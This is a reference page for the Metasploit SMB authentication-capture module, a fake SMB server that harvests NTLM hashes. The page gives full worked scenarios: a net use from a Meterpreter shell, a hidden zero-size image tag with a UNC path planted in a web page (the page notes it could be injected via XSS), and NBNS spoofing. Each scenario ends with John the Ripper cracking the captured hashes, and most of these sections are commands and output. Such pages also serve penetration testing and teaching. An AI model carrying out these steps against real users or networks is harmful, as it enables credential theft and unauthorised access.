Authentication Capture: SMB - Metasploit
This page contains detailed information about how to use the auxiliary/server/capture/smb metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Authentication Capture: SMB
Module: auxiliary/server/capture/smb
Source code: modules/auxiliary/server/capture/smb.rb
Disclosure date: -
Last modification time: 2021-08-27 17:23:41 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): -
List of CVEs: -
This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client systems. Responses sent by this service have by default the configurable challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel, L0phtcrack or John the ripper (with jumbo patch). To exploit this, the target system must try to authenticate to this module. One way to force an SMB authentication attempt is by embedding a UNC path (\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate. Another option is using auxiliary/spoof/{nbns,llmnr} to respond to queries for names the victim is already looking for.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > show targets
... a list of targets ...
msf auxiliary(smb) > set TARGET target-id
msf auxiliary(smb) > show options
... show and set options ...
msf auxiliary(smb) > exploit
Knowledge Base
This module creates a mock SMBv1 server which accepts credentials before returning NT_STATUS_LOGON_FAILURE
.
SMBv1 is enabled by default on systems before, and including:
- Windows XP
- Windows Server 2008 R2
Microsoft provides an article on how to detect, disable, and enable SMB in various versions here
Verification Steps
- Start msfconsole
- Do:
use auxiliary/server/capture/smb
- Do:
run
Options
CAINPWFILE
A file to store Cain & Abel formatted captured hashes in
CHALLENGE
An 8 byte server challenge. Default is 1122334455667788
JOHNPWFILE
A file to store John the Ripper formatted hashes in
Scenarios
Linux Connection via smbclient
Ubuntu 18.04 with smbclient 4.7.6-Ubuntu
installed.
Based on shellvoide.com
You'll need to set client use spnego = no
under [global]
in smb.conf
to ensure SMBv1 compatibility.
Server:
msf5 exploit(multi/handler) > use auxiliary/server/capture/smb
msf5 auxiliary(server/capture/smb) > set johnpwfile /tmp/john
johnpwfile => /tmp/john
msf5 auxiliary(server/capture/smb) > run
[*] Auxiliary module running as background job 0.
[*] SMB Captured - 2019-09-25 22:44:04 -0400
NTLMv2 Response Captured from 2.2.2.2:50978 - 2.2.2.2
USER:ubuntu DOMAIN:WORKGROUP OS:Unix LM:Samba
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:a6b70b49c8d42903fbe6231ce53a21ff
NT_CLIENT_CHALLENGE:01010000000000008aee33441474d501f8f62d51f6995359000000000200120057004f0052004b00470052004f005500500000000000
[*] SMB Capture - Empty hash captured from 2.2.2.2:50978 - 2.2.2.2 captured, ignoring ...
Client:
root@Kali:~# grep spnego /etc/samba/smb.conf
client use spnego = no
root@Kali:~# smbclient //1.1.1.1/fake
Enter WORKGROUP\root's password:
session setup failed: NT_STATUS_LOGON_FAILURE
Crack the Hash:
# cat /tmp/john_netntlmv2
ubuntu::WORKGROUP:1122334455667788:a6b70b49c8d42903fbe6231ce53a21ff:01010000000000008aee33441474d501f8f62d51f6995359000000000200120057004f0052004b00470052004f005500500000000000
# john /tmp/john_netntlmv2 --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
test (ubuntu)
1g 0:00:00:00 DONE (2019-09-25 22:46) 11.11g/s 1865Kp/s 1865Kc/s 1865KC/s 24782478..playpen
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
Windows XP via net use
Method also confirmed on Windows 2008r2
Based off of hackers-arise.com
The idea here is we have a shell on a Windows box where we can't hashdump
due to user permissions.
However, we're able to do a net use
to make an SMB
connection back to our server to get the
user's hash, then hopefully crack it.
meterpreter > getuid
Server username: WINXP\test
meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use auxiliary/server/capture/smb
msf5 auxiliary(server/capture/smb) > set johnpwfile /tmp/john
johnpwfile => /tmp/john
msf5 auxiliary(server/capture/smb) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/smb) >
[*] Started service listener on 0.0.0.0:445
[*] Server started.
msf5 auxiliary(server/capture/smb) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\test\Desktop>net use \\1.1.1.1 fake
[*] SMB Captured - 2019-09-25 22:26:04 -0400
NTLMv1 Response Captured from 2.2.2.2:1056 - 2.2.2.2
USER:test DOMAIN:WINXP OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1
LMHASH:7f1a8bbdf965d969339b08f160d292692f85252cc731bb25
NTHASH:e02333eb6ac047b8d4d4f5759b1a455161d4bc576f75460c
net use \\1.1.1.1 fake
System error 1326 has occurred.
Logon failure: unknown user name or bad password.
C:\Documents and Settings\test\Desktop>
We're now able to use John the Ripper to crack the password.
# cat /tmp/john_netntlm
test::WINXP:7f1a8bbdf965d969339b08f160d292692f85252cc731bb25:e02333eb6ac047b8d4d4f5759b1a455161d4bc576f75460c:1122334455667788
# john /tmp/john_netntlm --format=netlm --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Using default target encoding: CP850
Loaded 1 password hash (netlm, LM C/R [DES 32/64])
Warning: poor OpenMP scalability for this hash type, consider --fork=8
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
FAKE (test)
1g 0:00:00:00 DONE (2019-09-25 22:28) 1.333g/s 1398Kp/s 1398Kc/s 1398KC/s 123456..LATISHA1
Use the "--show --format=netlm" options to display all of the cracked passwords reliably
Session completed
UNC in Websites Vector
One way to coax a user into creating an SMB connection is to embed it in a website
First, create the website (we're using Kali for this) with the following content:
<html>
<head>
<title>UNC Example</title>
</head>
<body>
<img src="file:////1.1.1.1/fake.jpg" width="0px" height="0px">
</body>
</html>
This file, for the example is in /var/www/html/unc.html
.
Also of note, this could be done via XSS or other injection technique.
Start the webserver: service apache2 start
Server:
msf5 > use auxiliary/server/capture/smb
msf5 auxiliary(server/capture/smb) > set johnpwfile /tmp/john
johnpwfile => /tmp/john
msf5 auxiliary(server/capture/smb) > run
[*] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/smb) >
[*] Started service listener on 0.0.0.0:445
[*] Server started.
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:957c33ac7e9d7bf4459ddb2c65109aaa
NT_CLIENT_CHALLENGE:01010000000000007a7e22719474d5014eb86a13abf5f61000000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:e4411aead169063032e832539864b4ff
NT_CLIENT_CHALLENGE:0101000000000000fd0e3f719474d501ed3acc4801283dee00000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:f09d780a73410902dae21653cc9ef117
NT_CLIENT_CHALLENGE:0101000000000000bed143719474d5015e71b1d1c6aba91800000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:b9f84605b6cd0feb57c38f5d7251d5e0
NT_CLIENT_CHALLENGE:01010000000000007f9448719474d50164270f62c422d35200000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:a1f2d3c84c444368bea5cac47707faec
NT_CLIENT_CHALLENGE:01010000000000003f574d719474d50197b541b568bd9d3600000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:b895915d8c813c99512904bd1b84f2e2
NT_CLIENT_CHALLENGE:0101000000000000001a52719474d501b8fa9400bb1ff22f00000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:309c3abcd382e8541a811a8d9af66002
NT_CLIENT_CHALLENGE:0101000000000000c0dc56719474d501cea04f59f7a5dc5a00000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:1378542b978996b23f6f88c8d52b3d22
NT_CLIENT_CHALLENGE:0101000000000000819f5b719474d501cd5954986a11cd6600000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:425740c14d740ba89aae0533e1c320bb
NT_CLIENT_CHALLENGE:0101000000000000416260719474d501dc6bac2b5637209b00000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:b291ca93971c18c3fa3f9789c25296c8
NT_CLIENT_CHALLENGE:0101000000000000022565719474d501d583f2f3dbf2ea0000000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:3a908e59fe9f96a7f871b3aa2155dce1
NT_CLIENT_CHALLENGE:0101000000000000c2e769719474d5015e8a4d8a139e8eea00000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:2a76fc76174c297712b08e301ac1b08e
NT_CLIENT_CHALLENGE:010100000000000083aa6e719474d5019684d5d78475e27500000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:5d7057563a44671ec26ec021613f45b4
NT_CLIENT_CHALLENGE:0101000000000000a4ce75719474d50184900d6f208cb07500000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:ec6ce9d5171e9f5ee017d963797e760c
NT_CLIENT_CHALLENGE:010100000000000064917a719474d501006e93848f1fb88100000000020000000000000000000000
[*] SMB Captured - 2019-09-26 14:01:37 -0400
NTLMv2 Response Captured from 2.2.2.2:49160 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:d96937debde3ce251f6889fc1be21a2f
NT_CLIENT_CHALLENGE:010100000000000025547f719474d5014dd729fda10cf20c00000000020000000000000000000000
Client:
Browse to the webpage. This example is on Windows Server 2008r2 with Internet Explorer.
Crack the password:
john /tmp/john_netntlmv2 -wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 17 password hashes with 17 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Remaining 15 password hashes with 15 different salts
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
15g 0:00:00:00 DONE (2019-09-26 14:06) 115.3g/s 283569p/s 4253Kc/s 4253KC/s dyesebel..holaz
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
Spoofing NBNS
If the target(s) are on the local network, it's possible to conduct an nbns
spoof to attract
additional SMB queries to your host. This scenario will utilize auxiliary/spoof/nbns/nbns_response
to conduct the spoofing. If a Windows user attempts to browse or mount a network name such as
\\fake
, the nbns
module will respond back with the set IP.
This is based on hackingarticles.in
Server side:
msf5 > use auxiliary/server/capture/smb
msf5 auxiliary(server/capture/smb) > set johnpwfile /tmp/johnnbns
johnpwfile => /tmp/johnnbns
msf5 auxiliary(server/capture/smb) > run
[] Auxiliary module running as background job 0.
msf5 auxiliary(server/capture/smb) >
[] Started service listener on 0.0.0.0:445
[*] Server started.
msf5 auxiliary(server/capture/smb) > use auxiliary/spoof/nbns/nbns_response
msf5 auxiliary(spoof/nbns/nbns_response) > set spoofip 1.1.1.1
spoofip => 1.1.1.1
msf5 auxiliary(spoof/nbns/nbns_response) > set interface eth0
interface => eth0
msf5 auxiliary(spoof/nbns/nbns_response) > exploit
[] Auxiliary module running as background job 1.
msf5 auxiliary(spoof/nbns/nbns_response) >
[] NBNS Spoofer started. Listening for NBNS requests with REGEX "." ...
[+] 2.2.2.2 nbns - FAKE matches regex, responding with 1.1.1.1
[+] 2.2.2.2 nbns - FAKE matches regex, responding with 1.1.1.1
[] SMB Captured - 2019-09-26 16:19:09 -0400
NTLMv2 Response Captured from 2.2.2.2:49161 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:5a44b22db99861330e1637f0565f595f
NT_CLIENT_CHALLENGE:010100000000000022529fa7a774d501b3b3f093392560d600000000020000000000000000000000
[] SMB Captured - 2019-09-26 16:19:09 -0400
NTLMv2 Response Captured from 2.2.2.2:49161 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:00837cb572f0116c7544ca0f56d31f5c
NT_CLIENT_CHALLENGE:0101000000000000c606c3a7a774d501c28ee74be786099100000000020000000000000000000000
[] SMB Captured - 2019-09-26 16:19:09 -0400
NTLMv2 Response Captured from 2.2.2.2:49161 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:b571090dea4270b6b6d2b3de39321b29
NT_CLIENT_CHALLENGE:010100000000000087c9c7a7a774d501c00e467bda8a8b4a00000000020000000000000000000000
[*] SMB Captured - 2019-09-26 16:19:09 -0400
NTLMv2 Response Captured from 2.2.2.2:49161 - 2.2.2.2
USER:Administrator DOMAIN:WIN-O712LQK2K69 OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:dc28e9e94c6199e814937d61e3956c7d
NT_CLIENT_CHALLENGE:0101000000000000084fd1a7a774d5014f34895403460b1b00000000020000000000000000000000
Victim:
Open Explorer and type \\fake
Finally, Crack the password:
john /tmp/johnnbns_netntlmv2 -wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 6 password hashes with 6 different salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
Password123 (Administrator)
6g 0:00:00:00 DONE (2019-09-26 16:25) 100.0g/s 614400p/s 3686Kc/s 3686KC/s dyesebel..holaz
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
Word Document UNC Injector
Another strategy is to create content which can entice a user to open, containing a UNC link, and
thus creating an SMB connection. To accomplish this, we use auxiliary/docx/word_unc_injector
.
Go back to menu.
Msfconsole Usage
Here is how the server/capture/smb auxiliary module looks in the msfconsole:
msf6 > use auxiliary/server/capture/smb
msf6 auxiliary(server/capture/smb) > show info
Name: Authentication Capture: SMB
Module: auxiliary/server/capture/smb
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
hdm <[email protected]>
Available actions:
Name Description
---- -----------
Capture Run SMB capture server
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
CAINPWFILE no The local filename to store the hashes in Cain&Abel format
CHALLENGE 1122334455667788 yes The 8 byte server challenge
JOHNPWFILE no The prefix to the local filename to store the hashes in John format
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 445 yes The local port to listen on.
Description:
This module provides a SMB service that can be used to capture the
challenge-response password hashes of SMB client systems. Responses
sent by this service have by default the configurable challenge
string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy
cracking using Cain & Abel, L0phtcrack or John the ripper (with
jumbo patch). To exploit this, the target system must try to
authenticate to this module. One way to force an SMB authentication
attempt is by embedding a UNC path (\\SERVER\SHARE) into a web page
or email message. When the victim views the web page or email, their
system will automatically connect to the server specified in the UNC
share (the IP address of the system running this module) and attempt
to authenticate. Another option is using
auxiliary/spoof/{nbns,llmnr} to respond to queries for names the
victim is already looking for.
Module Options
This is a complete list of options available in the server/capture/smb auxiliary module:
msf6 auxiliary(server/capture/smb) > show options
Module options (auxiliary/server/capture/smb):
Name Current Setting Required Description
---- --------------- -------- -----------
CAINPWFILE no The local filename to store the hashes in Cain&Abel format
CHALLENGE 1122334455667788 yes The 8 byte server challenge
JOHNPWFILE no The prefix to the local filename to store the hashes in John format
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 445 yes The local port to listen on.
Auxiliary action:
Name Description
---- -----------
Capture Run SMB capture server
Advanced Options
Here is a complete list of advanced options supported by the server/capture/smb auxiliary module:
msf6 auxiliary(server/capture/smb) > show advanced
Module advanced options (auxiliary/server/capture/smb):
Name Current Setting Required Description
---- --------------- -------- -----------
DOMAIN_NAME anonymous yes The domain name used during smb exchange with SMB_EXTENDED_SECURITY set.
ListenerComm no The specific communication channel to use for this service
NTLM_UseNTLM2_session false yes Activate the 'negotiate NTLM2 key' flag in NTLM authentication. When SMB_EXTENDED_SECURITY negotiate is set, client will use ntlm2_session instead of ntlmv1 (default on win 2K and above)
SMBServerIdleTimeout 120 yes The maximum amount of time to keep an idle session open in seconds
SMBServerMaximumBuffer 2 yes The maximum number of data in megabytes to buffer
SMB_EXTENDED_SECURITY false yes Use smb extended security negotiation, when set client will use ntlmssp, if not then client will use classic lanman authentification
SSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
SSLCompression false no Enable SSL/TLS-level compression
USE_GSS_NEGOTIATION true yes Send a gss_security blob in smb_negotiate response when SMB extended security is set. When this flag is not set, Windows will respond without gss encapsulation, Ubuntu will still use gss.
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the server/capture/smb module can do:
msf6 auxiliary(server/capture/smb) > show actions
Auxiliary actions:
Name Description
---- -----------
Capture Run SMB capture server
Evasion Options
Here is the full list of possible evasion options supported by the server/capture/smb auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(server/capture/smb) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
TCP::max_send_size 0 no Maximum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Failed closing SMB server socket
Here is a relevant code snippet related to the "Failed closing SMB server socket" error message:
249:
250: def cleanup
251: begin
252: @rsock.close if @rsock
253: rescue => e
254: elog('Failed closing SMB server socket', error: e)
255: end
256:
257: super
258: end
259:
Go back to menu.
Related Pull Requests
- #13443 Merged Pull Request: Add descriptions to auxiliary modules Actions
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #5059 Merged Pull Request: Yard doc corrections
- #4768 Merged Pull Request: Reorganize SMB mixins
- #4613 Merged Pull Request: auxiliary/server/capture/smb credential creation
- #2525 Merged Pull Request: Change module boilerplate
- #1450 Merged Pull Request: This fixes a mulit-line output bug
- #1274 Merged Pull Request: Fix smb capture error
- #1228 Merged Pull Request: MSFTIDY cleanup #1 - auxiliary
- #1158 Merged Pull Request: fix typos
- #503 Merged Pull Request: Added a bit of verbosity to enhance logging and post exploitation
Go back to menu.
See Also
Check also the following modules related to this module:
- auxiliary/server/capture/drda
- auxiliary/server/capture/ftp
- auxiliary/server/capture/http
- auxiliary/server/capture/http_basic
- auxiliary/server/capture/http_javascript_keylogger
- auxiliary/server/capture/http_ntlm
- auxiliary/server/capture/imap
- auxiliary/server/capture/mssql
- auxiliary/server/capture/mysql
- auxiliary/server/capture/pop3
- auxiliary/server/capture/postgresql
- auxiliary/server/capture/printjob_capture
- auxiliary/server/capture/sip
- auxiliary/server/capture/smtp
- auxiliary/server/capture/telnet
- auxiliary/server/capture/vnc
- auxiliary/dos/smb/smb_loris
- auxiliary/fuzzers/smb/smb_create_pipe
- auxiliary/fuzzers/smb/smb_create_pipe_corrupt
- auxiliary/fuzzers/smb/smb_negotiate_corrupt
- auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt
- auxiliary/fuzzers/smb/smb_tree_connect
- auxiliary/fuzzers/smb/smb_tree_connect_corrupt
- auxiliary/scanner/smb/smb_enum_gpp
- auxiliary/scanner/smb/smb_enumshares
- auxiliary/scanner/smb/smb_enumusers
- auxiliary/scanner/smb/smb_enumusers_domain
- auxiliary/scanner/smb/smb_login
- auxiliary/scanner/smb/smb_lookupsid
- auxiliary/scanner/smb/smb_ms17_010
- auxiliary/scanner/smb/smb_uninit_cred
- auxiliary/scanner/smb/smb_version
- auxiliary/server/teamviewer_uri_smb_redirect
Authors
hdm
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.